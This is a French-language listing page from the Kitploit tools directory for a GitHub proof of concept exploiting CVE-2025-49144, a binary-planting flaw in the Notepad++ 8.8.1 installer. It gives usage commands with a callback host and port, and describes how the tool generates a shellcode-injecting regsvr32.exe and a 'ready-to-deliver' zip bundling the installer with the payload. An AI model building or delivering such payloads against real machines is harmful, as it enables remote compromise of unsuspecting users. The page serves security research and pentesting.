Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Notepad-8.8.1_CVE-2025-49144 — Preuve de concept (PoC) qui exploite la vulnérabilité CVE-2025-49144 dans l'installateur Notepad++ 8.8.1. | Kitploit
Outils/GitHubGitHub/b0ysie7e/notepad-8.8.1_cve-2025-49144
Génération de PayloadsExploitationShellcodeTests d'IntrusionApprentissage et ÉducationExploitation de Binaires
GitHubb0ysie7e/notepad-8.8.1_cve-2025-49144

Notepad-8.8.1_CVE-2025-49144

Preuve de concept (PoC) qui exploite la vulnérabilité CVE-2025-49144 dans l'installateur Notepad++ 8.8.1.

Voir le dépôt
613il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-49144 – Exploit pour Notepad++ 8.8.1

Ce dépôt contient une preuve de concept (PoC) fonctionnelle qui exploite la vulnérabilité CVE-2025-49144 dans l'installateur Notepad++ 8.8.1. L'exécution malveillante se produit en plaçant un binaire (regsvr32.exe) dans le même répertoire que l'installateur vulnérable. Lorsque l'installateur est exécuté, il hérite du contexte et déclenche la charge utile.

⚠️ Avertissement
Ce code est strictement destiné à des fins éducatives et de recherche uniquement. Une utilisation non autorisée sur des systèmes sans permission explicite peut constituer une violation de la loi.
L'auteur n'est pas responsable de toute utilisation abusive ou malveillante de cet outil.


🧪 Prérequis

  • Python 3.x
  • msfvenom (partie de Metasploit Framework)
  • mingw-w64 (x86_64-w64-mingw32-gcc)
  • Installateur vulnérable : npp.8.8.1.Installer.x64.exe (doit être placé manuellement dans le même répertoire)

⚙️ Utilisation

root@kitploit:~
python3 exploit.py -i <LHOST> -p <LPORT>

Exemple :

root@kitploit:~
python3 exploit.py -i 192.168.100.10 -p 4444

Cela générera les fichiers suivants :

  • regsvr32.exe : exécutable qui injecte du shellcode dans un processus distant notepad.exe.
  • notepad_payload.zip : archive prête à livrer contenant :
    • npp.8.8.1.Installer.x64.exe
    • regsvr32.exe

🎬 Démonstration

[Demo Preview]

Télécharger l’outil